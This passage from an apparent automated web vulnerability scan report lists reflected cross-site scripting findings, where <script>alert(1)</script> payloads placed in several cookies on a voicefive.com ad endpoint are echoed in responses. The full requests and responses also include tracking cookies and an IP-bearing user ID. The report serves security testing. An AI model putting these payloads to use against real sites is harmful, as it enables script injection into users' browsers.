P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27666

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"314453502",Pid:"p97174789",Arc:"210323172",Location:
...[SNIP]...
May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p45555483": 'exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&726b0<script>alert(1)</script>fbebf95c3f4', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://pho
...[SNIP]...

3.204. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 9763f<script>alert(1)</script>b85ab2fbc5b was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&9763f<script>alert(1)</script>b85ab2fbc5b; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:26 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&9763f<script>alert(1)</script>b85ab2fbc5b', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "ar_p91143664":
...[SNIP]...

3.205. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload de55a<script>alert(1)</script>8d97d1e7f37 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&de55a<script>alert(1)</script>8d97d1e7f37; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:27 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&de55a<script>alert(1)</script>8d97d1e7f37' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

3.206. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload fe9a7<script>alert(1)</script>0f4bc0e66de was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&fe9a7<script>alert(1)</script>0f4bc0e66de; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:27 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
May 17 20:12:51 2011&recExp=Thu Jun 16 12:25:26 2011&prad=242390405&arc=206438244&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&fe9a7<script>alert(1)</script>0f4bc0e66de', "BMX_G": 'method->
...[SNIP]...

3.207. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 14d7c<script>alert(1)</script>18907efdd96 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&14d7c<script>alert(1)</script>18907efdd96; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:26 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": 'method->-1,ts->1308225881', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&14d7c<script>alert(1)</script>18907efdd96', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

3.208. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload f7fe0<script>alert(1)</script>9cea98b2b2d was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390407&AR_C=189403547 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308245424385&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=8&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:48:09 2011&prad=242390407&arc=178113654&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&f7fe0<script>alert(1)</script>9cea98b2b2d; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=recruitFrequency%2D%3E1%2Cpid%2D%3Ep85001580%2Cprad%2D%3E62126627%2Car_c%2D%3E42474885%2Cmethodology%2D%3E4%2Cinv%2D%3Einv_3_300x250%2Cgrp%2D%3E1%2Clocation%2D%3Ehttp%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2FN3867%2E270604%2EB3%2FB5387288%2E7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fh%2Eclick%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3%2Emookie1%2Ecom%2FRealMedia%2Fads%2Fclick_lx%2Eads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2%2Ehtml%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F%2Creferrer%2D%3Ehttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fp%2Emedia%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag%2Ehtml%2Cpath%2D%3Ehttp%3A%2F%2Far%2Evoicefive%2Ecom%2Fbmx3%2F%2Cbranding%2D%3Eb3%2Cversion%2D%3E3%2E0%2Csite%2D%3E500%2Cdelay%2D%3E5000%2Cdom%2D%3E121%2Cinv_type%2D%3E3%2Cts%2D%3E1308233340%2E003%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 17:30:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=10&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 17:30:51 2011&prad=242390407&arc=189403547&; expires=Wed 14-Sep-2011 17:30:51 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27546

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390407",Pid:"p97174789",Arc:"189403547",Location:
...[SNIP]...
0&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "ar_p85001580": 'exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&f7fe0<script>alert(1)</script>9cea98b2b2d', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recE
...[SNIP]...

3.209. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 14e24<script>alert(1)</script>b86076f8671 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&14e24<script>alert(1)</script>b86076f8671; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:25 GMT
Content-Type: application/x-javascript
Connection: close
